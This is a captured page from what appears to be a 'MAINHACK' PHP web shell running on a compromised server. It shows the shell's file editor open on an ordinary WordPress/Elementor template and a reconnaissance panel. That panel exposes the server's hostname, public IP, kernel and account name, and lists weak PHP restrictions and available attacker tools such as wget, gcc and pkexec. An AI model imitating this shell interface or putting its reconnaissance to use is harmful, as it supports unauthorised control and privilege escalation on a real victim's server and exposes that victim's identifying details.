[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: layout1.php
<?php $default_settings = [ 'title' => '', 'phone_label' => '', 'phone_number' => '', 'email_label' => '', 'email' => '', 'image' => '', 'ct_animate' => '', ]; $settings = array_merge($default_settings, $settings); extract($settings); $html_id = ct_get_element_id($settings); if ( ! empty( $btn_link['url'] ) ) { $widget->add_render_attribute( 'button', 'href', $btn_link['url'] ); if ( $btn_link['is_external'] ) { $widget->add_render_attribute( 'button', 'target', '_blank' ); } if ( $btn_link['nofollow'] ) { $widget->add_render_attribute( 'button', 'rel', 'nofollow' ); } } $is_new = \Elementor\Icons_Manager::is_migration_allowed(); ?> <div class="ct-cta1 bg-image <?php echo esc_attr($ct_animate); ?>"> <div class="ct-cta-content"> <?php if(!empty($title)) : ?> <h3 class="item--title"><?php echo ct_print_html($title); ?></h3> <?php endif; ?> <div class="ct-cta-holder"> <?php if(!empty($phone_number)) : ?> <div class="ct-cta-info"> <div class="ct-cta-label"><span><?php echo esc_attr($phone_label); ?></span></div> <a href="tel:<?php echo esc_attr($phone_number); ?>"><i class="flaticon-telephone-call"></i><?php echo esc_attr($phone_number); ?></a> </div> <?php endif; ?> <div class="ct-cta-text"><?php echo esc_html__('or', 'alico'); ?><span></span></div> <?php if(!empty($email)) : ?> <div class="ct-cta-info"> <div class="ct-cta-label"><span><?php echo esc_attr($email_label); ?></span></div> <a href="mailto:<?php echo esc_attr($email); ?>"><i class="flaticon-v2-mail"></i><?php echo esc_attr($email); ?></a> </div> <?php endif; ?> </div> </div> <?php if(!empty($image['id'])) : $img = ct_get_image_by_size( array( 'attach_id' => $image['id'], 'thumb_size' => 'full', ) ); $thumbnail = $img['thumbnail']; ?> <div class="ct-cta-image"> <?php echo wp_kses_post($thumbnail); ?> </div> <?php endif; ?> </div>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.66 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002